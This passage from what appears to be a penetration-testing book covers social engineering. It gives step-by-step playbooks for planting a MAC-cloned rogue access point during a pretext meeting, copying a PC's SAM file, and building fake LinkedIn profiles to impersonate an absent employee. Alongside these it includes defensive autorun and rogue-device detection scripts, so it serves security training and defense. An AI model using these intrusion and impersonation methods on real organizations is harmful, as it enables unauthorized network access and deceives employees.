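    """Minimal INI parser: {section (lowercase): {key (lowercase): value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line:
            key, _, value = line.partition("=")
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def tokenize(command: str) -> List[str]:
    """Split a command line into tokens, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]


def basename(path: str) -> str:
    """Last path component, lowercased; works for both \\ and / separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_launch_key(key: str) -> bool:
    # open= and shellexecute= run on insertion; shell\<verb>\command= runs from the context menu.
    return key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command"))


def analyze_autorun(text: str) -> List[Tuple[str, str]]:
    """Return (category, detail) findings for the [AutoRun] section."""
    findings: List[Tuple[str, str]] = []
    autorun = parse_inf(text).get("autorun", {})
    icon_target = basename(autorun.get("icon", "").split(",")[0])

    for key, value in autorun.items():
        if not is_launch_key(key):
            continue
        tokens = tokenize(value)
        if not tokens:
            continue
        program = basename(tokens[0])
        host = program[:-4] if program.endswith(".exe") else program
        # The file that actually does the work: the host's first argument when a host is used.
        launched = tokens[1] if host in SCRIPT_HOSTS and len(tokens) > 1 else tokens[0]

        if host in SCRIPT_HOSTS:
            findings.append(("script-host", f"{key}= runs through '{tokens[0]}'"))
        if launched.lower().endswith(SCRIPT_EXTS):
            findings.append(("script-file", f"{key}= executes script '{launched}'"))
        if re.search(r"[^\\/]+[\\/][^\\/]+", launched):
            findings.append(("subdirectory", f"{key}= target '{launched}' is not in the drive root"))
        if icon_target and basename(launched) != icon_target:
            findings.append(("icon-mismatch",
                             f"icon= shows '{icon_target}' but {key}= launches '{basename(launched)}'"))
    return findings


def risk_level(findings: List[Tuple[str, str]]) -> str:
    """Grade: any disguise indicator is high, a bare script host is medium, else low."""
    cats = {c for c, _ in findings}
    if cats & {"script-file", "subdirectory", "icon-mismatch"}:
        return "high"
    if "script-host" in cats:
        return "medium"
    return "low"


if __name__ == "__main__":
    for name, text in (("stock", STOCK_AUTORUN), ("modified", MODIFIED_AUTORUN)):
        result = analyze_autorun(text)
        print(f"{name}: {risk_level(result)}")
        for cat, detail in result:
            print(f"  [{cat}] {detail}")
```

Run it against any autorun.inf recovered from a drive before deciding what to do with the drive. The stock U3 file is itself graded medium because its open= line goes through wscript, which is the point: a label allow list cannot tell benign from hostile, so the controls the chapter names (device control and disabling autorun) are the real fix. On Windows, disabling autorun is enforced through the NoDriveTypeAutoRun policy value under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, where 0xFF disables AutoRun for every drive type.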

The Meeting

The goal of this attack is to place an unauthorized wireless access point (WAP) on the corporate network.
This attack requires face-to-face contact with the target. A pretext for a meeting is required, such as a desire to purchase goods or services on a level that requires a face-to-face meeting. Set the meeting time for just after lunch and arrive about 30 to 45 minutes before your meeting, with the goal of catching your victim away at lunch. Explain to the receptionist that you have a meeting scheduled after lunch but were in the area on other business and decided to come early. Ask whether it is okay to wait for the person to return from lunch. Have an accomplice phone you shortly after you enter the building, act slightly flustered after you answer your phone, and ask the receptionist if there is some place you can take your call privately. Most likely you’ll be offered a conference room. Once inside the conference room, close the door, find a wall jack, and install your wireless access point. Have some Velcro or double-sided sticky tape handy to secure it out of view (behind a piece of furniture, for instance) and a good length of cable to wire it into the network. If you have time, you may also want to clone the MAC address of a computer in the room and then wire that computer into your access point in the event they’re using port-level access control. This ruse should provide enough time to set up the access point. Be prepared to stay in the room until you receive confirmation from your team that the access point is working and they have access to the network. Once you receive notification that they have access, inform the receptionist that an emergency has arisen and that you’ll call to reschedule your appointment.
The beauty of this attack is that it is often successful and usually only exposes one team member to a single target employee, a receptionist in most cases. It’s low tech and inexpensive as well.
In our example, we’re going to use a Linksys Wireless Access Point and configure it for MAC cloning. For this example, you’ll need

• A Linksys Wireless Access Point
• Double-sided Velcro tape or sticky tape
• A 12-inch or longer CAT5 patch cable

Have the WAP ready with double-sided tape already stuck to the desired mounting surface. You’ll want to be prepared for unexpected configuration problems such as a long distance between the network wall jack or power outlet and a suitable hiding place. A few simple tools such as a screwdriver, utility knife, and duct tape will help you deal with unexpected challenges. It’s also wise to have any adapters you may need. Depending on which area of the country you’re working in, some older buildings may not have grounded outlets, in which case you’ll need an adapter. In addition to physical tools, you’ll want to bring along a flash drive and a bootable Linux Live CD or bootable flash drive loaded with Knoppix or Ubuntu in case there is a computer in the conference room (there usually is).
Once you’re inside the conference room with the door closed, determine if there is a computer in the room. If there is, unplug its network cable and attempt to boot it from the CD or a flash drive. If you’re successful, plug it into the wireless router and allow it to receive an IP from the DHCP controller. Using the browser from the Linux Live CD, go to the WAP IP address—typically this is 192.168.1.1 by default for most configurations. In our example, we’ll use a Linksys Wireless-G Broadband Router. From the Setup tab, select Mac Address Clone and enable it, as shown next. Most WAPs give you the option to automatically determine the MAC address of the machine you’re currently connecting from.

Once set, save your settings. If the WAP you’re using does not offer an option to automatically determine the MAC address, simply run ifconfig from the Linux command prompt and the MAC address of each interface on the system will be displayed. If you’re working from Windows, ipconfig /all will display a similar list. In either case, you’ll have to determine the active interface and manually enter the MAC address displayed into the dialog box.
Once the MAC is cloned, plug the WAP into the wall network jack the PC used to be in so that the WAP is in between the PC and the network wall jack. To the network it appears as if the computer is still connected to the network. Some infrastructures have network port-level security and will notice a new MAC address. By using MAC cloning, you are less likely to be noticed initially connecting to the network, but because you’ve put the conference room computer behind a NAT router, you may have limited access to it from the local network, which could lead to eventual discovery.
Next, have a member of your team confirm that the WAP can be connected to from outside the building and that the corporate network is visible. While you still have the conference room PC booted from the Linux Live CD, grab a copy of the SAM file for later cracking, as described in Chapter 8. If all goes well, you now have access to the internal network from nearby, so tell the receptionist you’ll call to reschedule your appointment and leave. If your team cannot get onto the internal network, take everything with you. It’s not going to suddenly start working, and leaving anything behind could lead to being prematurely discovered.
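The text notes that port-level security will notice a new MAC address and that cloning the conference room PC’s MAC is what blunts that check. The following Python script is an added example, not code from the book or from any vendor it names; it shows what the network team still has to work with. It compares a baseline of switch-port MAC bindings and DHCP client fingerprints (hostname, vendor class identifier, and the option 55 parameter request list) against a later snapshot. The port-security check is blind once the MAC is cloned; the DHCP fingerprint check is not, because a small router’s DHCP client does not request the same options or announce the same vendor class as the Windows PC whose MAC it borrowed. All port names, MAC addresses and fingerprint values below are constructed for the example.

```python
"""Detecting a device that has cloned a known MAC on a known switch port.

Added example, not from the book. Compares a baseline of switch-port MAC
bindings and DHCP client fingerprints with a later snapshot; every value below
is constructed for illustration.
"""
from dataclasses import dataclass, fields
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class DhcpFingerprint:
    """The parts of a DHCP DISCOVER/REQUEST that identify the client software."""
    hostname: str                        # option 12
    vendor_class: str                    # option 60
    param_request_list: Tuple[int, ...]  # option 55, in the order the client sent it


# Constructed baseline captured on a normal day: port -> MAC, MAC -> fingerprint.
BASELINE_PORTS: Dict[str, str] = {
    "Gi1/0/12": "00:1a:2b:3c:4d:5e",  # conference room PC
    "Gi1/0/13": "00:1a:2b:3c:4d:6f",  # reception PC
}
WINDOWS_PRL = (1, 15, 3, 6, 44, 46, 47, 31, 33, 121, 249, 43)
BASELINE_DHCP: Dict[str, DhcpFingerprint] = {
    "00:1a:2b:3c:4d:5e": DhcpFingerprint("CONF-RM-PC01", "MSFT 5.0", WINDOWS_PRL),
    "00:1a:2b:3c:4d:6f": DhcpFingerprint("RECEPTION-PC", "MSFT 5.0", WINDOWS_PRL),
}

# Constructed snapshot after the swap described in the text: the same MAC is still
# on Gi1/0/12, but the DHCP client behind it now looks like an embedded router.
SNAPSHOT_PORTS: Dict[str, str] = dict(BASELINE_PORTS)
SNAPSHOT_DHCP: Dict[str, DhcpFingerprint] = {
    "00:1a:2b:3c:4d:5e": DhcpFingerprint("", "udhcp 1.x", (1, 3, 6, 12, 15, 28, 42)),
    "00:1a:2b:3c:4d:6f": BASELINE_DHCP["00:1a:2b:3c:4d:6f"],
}

# Constructed snapshot of a rogue device that did not bother to clone the MAC.
NAIVE_SNAPSHOT_PORTS: Dict[str, str] = {
    "Gi1/0/12": "c8:d7:19:aa:bb:cc",
    "Gi1/0/13": "00:1a:2b:3c:4d:6f",
}
NAIVE_SNAPSHOT_DHCP: Dict[str, DhcpFingerprint] = {
    "c8:d7:19:aa:bb:cc": DhcpFingerprint("", "udhcp 1.x", (1, 3, 6, 12, 15, 28, 42)),
    "00:1a:2b:3c:4d:6f": BASELINE_DHCP["00:1a:2b:3c:4d:6f"],
}


def port_security_alerts(baseline: Dict[str, str], snapshot: Dict[str, str]) -> List[str]:
    """Classic port security: alert when a port shows a MAC other than its baseline MAC."""
    alerts: List[str] = []
    for port, mac in sorted(snapshot.items()):
        expected = baseline.get(port)
        if expected is None:
            alerts.append(f"{port}: unexpected device {mac} on a port with no baseline")
        elif mac != expected:
            alerts.append(f"{port}: MAC changed {expected} -> {mac}")
    return alerts


def fingerprint_alerts(baseline: Dict[str, DhcpFingerprint],
                       snapshot: Dict[str, DhcpFingerprint]) -> List[str]:
    """Alert when a known MAC starts sending DHCP requests that look like different software."""
    alerts: List[str] = []
    for mac, fp in sorted(snapshot.items()):
        known = baseline.get(mac)
        if known is None:
            alerts.append(f"{mac}: no baseline DHCP fingerprint")
            continue
        changed = [f.name for f in fields(DhcpFingerprint)
                   if getattr(fp, f.name) != getattr(known, f.name)]
        if changed:
            alerts.append(f"{mac}: DHCP fingerprint changed ({', '.join(changed)})")
    return alerts


def audit(snapshot_ports: Dict[str, str],
          snapshot_dhcp: Dict[str, DhcpFingerprint]) -> Dict[str, List[str]]:
    """Run both checks against the constructed baseline."""
    return {
        "port_security": port_security_alerts(BASELINE_PORTS, snapshot_ports),
        "dhcp_fingerprint": fingerprint_alerts(BASELINE_DHCP, snapshot_dhcp),
    }


if __name__ == "__main__":
    for label, result in (("cloned MAC", audit(SNAPSHOT_PORTS, SNAPSHOT_DHCP)),
                          ("naive rogue", audit(NAIVE_SNAPSHOT_PORTS, NAIVE_SNAPSHOT_DHCP))):
        print(label)
        for check, alerts in result.items():
            print(f"  {check}: {alerts or ['no alerts']}")
```

In production the baseline would come from the switch’s MAC address table and the DHCP server’s or a sensor’s record of client options rather than from literals, but the comparison is the same: the cloned-MAC case produces no port-security alert at all and a single fingerprint alert naming every field that changed, while the naive rogue trips port security immediately and shows up in DHCP as a MAC with no history.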

Join the Company

In this attack, we’ll use social media to attract employees of the target company to join our social networking group. The goal of the attack is to learn enough about the employees of the target company to successfully impersonate one well enough to gain physical access.
As mentioned earlier in the chapter, employees of a specific company are often easily identified on business social networking sites like LinkedIn. By searching and finding employees of the target company, it may be possible to get them to associate with you on the site. One simple way to do that is to create a fake profile claiming to work at the same company and then send invitations to every user you can find that currently works or formerly worked at the target company. It may be slow going at first, but once a few of them accept your invitation, perhaps out of a desire to increase the number of their own connections, it will legitimize you to others in the organization. Once connected to them, you can follow their posts and gain access to more details about them, including what specifically they do and who they’re associated with. You can now also communicate directly with them through the site’s messaging system. Another way to associate with a group of employees is to create a group for the target company and send invitations to people you’ve identified as employees. The more people that join, the faster other people will join. Soon you will have access to quite a few employees as well as know who they associate with.
Once you have a large enough group and enough information about associations, you will have multiple opportunities at your disposal. We’ll focus on just one: impersonating someone. To start with, you should learn which employees work at which facilities. Extensions, direct dial phone numbers, and mobile numbers can be a big help in this case as well. If possible, you’ll want to select someone that is away from the office, perhaps even on vacation. On a social media site, it’s not hard to get people to talk about such things; you can just ask, or even start a topic thread on, where people are planning to vacation. Most people are more than happy to talk about it. If possible, target someone who looks similar to the person on your team you’ll be sending into the company.
A good pretext for getting into the company is that you’re traveling, some urgent business has come up, and you need temporary access to do some work because the files you need are not accessible from outside the company network. Another possible pretext is that you’re going to be in the area on a specific date and would like to stop in to do some work for a few hours. This is an especially powerful pretext if you use a spoofed caller ID to call in the request from your “boss” to security for access. In one recent case reported by a penetration tester, corporate security issued temporary access credentials based on a similar pretext and fake ID badge. Creating a fake ID badge will be covered in greater detail in Chapter 5.
This attack requires nothing but knowledge of social media sites and some time to get to know the people you connect with at your target company. By selecting a subject who you know is away from the office, you can create a window of opportunity to impersonate them in their absence—usually more than enough time to achieve your objective once you have physical access to the data network. By being knowledgeable and conversant in company matters with the information you’ve collected from your social media assets, you can easily build rapport and trust with the employees at the target company online and in person while onsite.
As this is a straightforward information-gathering attack on a company, we’ll use LinkedIn as an example. LinkedIn allows a user to search by company name. Any LinkedIn user who currently or formerly worked at the target and associated themselves with the company name in their profile will be listed in the search results. We can then narrow the search by country, state, or region to more narrowly target individuals who work at the division or facility we’re interested in. Once we’ve created a list of targets, we can search for the same individuals using other social media sites—Facebook, for example. Infiltrating multiple social networks and targeting individuals working for or associated with the target company will yield a lot of valuable intelligence. Using this information with the scenarios described in this section can provide the social engineer with ample attack opportunities.

References
ISO Commander www.isocommander.com
Knoppix www.knoppix.com
U3 Launchpad Installer http://mp3support.sandisk.com/downloads/LPInstaller.exe
Ubuntu www.ubuntu.com
Windows Netcat www.securityfocus.com/tools/139

Preparing Yourself for Face-to-Face Attacks

It’s one thing to send an e-mail to or chat with someone online during a SEA, but it’s quite another to meet face to face with them, or even speak to them on the phone for that matter. When working online, you can make your attempt and then sit back and see if you get a result. When you’re face to face, you never know what the other person is going to say, so you simply must be prepared for anything, including the worst. In order to successfully mount a face-to-face SEA, you must not only look the part you’re playing, but also appear as comfortable as you would if you were having a relaxed conversation with a friend. Ideally you want your attitude to put people at ease. This is easier said than done; walking across a wooden plank is easy when it’s on the ground, but put it 50 feet in the air and suddenly it’s quite difficult—not because the physical actions are any different, but because your mind is now acutely aware of the risk of falling. To your body, it’s the same. In social engineering, you may experience many different emotions, from fear to exhilaration. To achieve your goal, you’re lying to and deceiving people who are probably being nice and even helpful to you. It can be extremely stressful.
If you appear nervous, you will be less convincing. People are more likely to question you when you appear out of place or uncomfortable; it will get you noticed for all the wrong reasons. Maintaining calm while attempting to deceive someone might not come naturally or easily for you depending on your personality and life experience. It can be learned, however. The most useful metric for determining how calm you are is your heart rate. During a face-to-face encounter with your subject or subjects, you will most likely experience an increase in adrenaline. This is due to a natural fight-or-flight response to what your mind perceives as a possible conflict or confrontation. This will elevate your heart rate and make your palms and/or face sweat, which may make you look nervous. Looking nervous is a bad thing for a social engineer who is trying to convince someone they belong and that everything is normal.
In order to consciously manage this response, you must start by knowing your resting heart rate. An easy way to determine this is to purchase an inexpensive wrist heart rate monitor such as a Mio Watch. The most accurate way to determine your resting heart rate is to take your pulse when you first wake up but haven’t gotten out of bed. When you’re conversing with a face-to-face target, you’ll want to be within about 20 percent of your resting heart rate to look comfortable. That means if your resting heart rate is 65 beats per minute (bpm), it shouldn’t get over 80 bpm or you’ll start to appear nervous. Often, an inexperienced social engineer will have a heart rate of 120 bpm or more during their first face-to-face attempts. This is especially true with physical penetrations, which are described in Chapter 5.
You can learn to manage your heart rate using basic relaxation techniques such as meditation, acupressure, and reflexology. Find a technique that works for you, practice it, and use it just prior to executing your SEA. You can also try to retrain or desensitize your instinctive conflict response. Try this exercise: As you walk in public and encounter people, look them directly in the eye and hold eye contact with them until they break it or you move past them. Don’t stare like a psychopath, but try not to smile or look threatening, either; just hold eye contact. Your heart rate will likely elevate in early trials, but over time this will become easier and your body won’t respond as strongly to it. Keep in mind that this type of eye contact is a primal human dominance posture and could elicit an angry response. If confronted, simply and apologetically explain that you thought you knew the person but weren’t sure. Over time you will gain more control over your responses and reactions to conflict. You will be able to remain calm and act naturally when confronting a target or being confronted.
You should also practice any discrete components of your attack plan multiple times prior to execution. The more times you repeat something, the more likely you’ll be comfortable saying it one more time. It’s advisable to have a base script to work from and then deviate as circumstances necessitate. Rehearsing as a team also helps. The more possible deviations you can think of ahead of time, the more relaxed and prepared you’ll be when the time comes for you to meet your target face to face.
In addition to rehearsing what you’ll say, rehearse what you’ll have with you—a computer bag, for instance, or maybe your lunch. Think about how you’ll hold it. A common beginner mistake is to not have something to do with their hands. It seems like something you shouldn’t have to think about, but when you feel self-conscious, you often forget what to do with your hands, and awkward movements can make you look very nervous. If in doubt, make sure you have things to hold, or simply think about where to put your hands in advance. Practice standing with your hands in your desired pose in front of a mirror, find positions that look best for you, and practice them.
Another common nervous response brought on by the fight-or-flight instinct is excess salivation. This can make you swallow nervously while you’re trying to talk but can be easily remedied with chewing gum, a breath mint, or hard candy, any of which will keep your salivation more or less constant during the stressful part of your encounter with your target.

Reference
Mio Heart Monitor http://mioglobal.com

Defending Against Social Engineering Attacks

Hardening your environment to withstand SEAs, especially targeted ones, is more a matter of training than a traditional security control. An SEA goes right to the most vulnerable point in a company’s defenses: its employees. For the reasons discussed in the preceding sections, people make decisions daily that impact or even compromise implemented security measures. Every con man knows that there is a combination of words or actions that will get almost anyone to unknowingly perform an action or reveal information they shouldn’t. This is because most people do not perceive the risk of their actions. Failure to perceive the risk until it is too late is at the heart of most SEAs.
A bank teller knows that they are working in an environment that requires security and vigilance. They probably don’t have to be reminded of the threat of robbery; they are aware of it and understand the risk of being robbed is very real. Unfortunately, the level of awareness is not the same in most corporate environments. Employees typically perceive the threat of an SEA to be hypothetical and unlikely, even if they’ve been victimized in the past. This has to do with the perceived value of information assets. Money has an overt value, whereas information and data do not.
The best defense against SEAs is awareness training and simulated targeted attacks. A comprehensive program will help employees recognize the value of the assets being protected as well as the costs associated with a breach. The program should also give real-world attack examples that demonstrate the threat. In conjunction with awareness training, simulated attacks should be regularly performed in an attempt to determine the effectiveness of the awareness program. Results can then be fed back into the process and included in ongoing awareness training.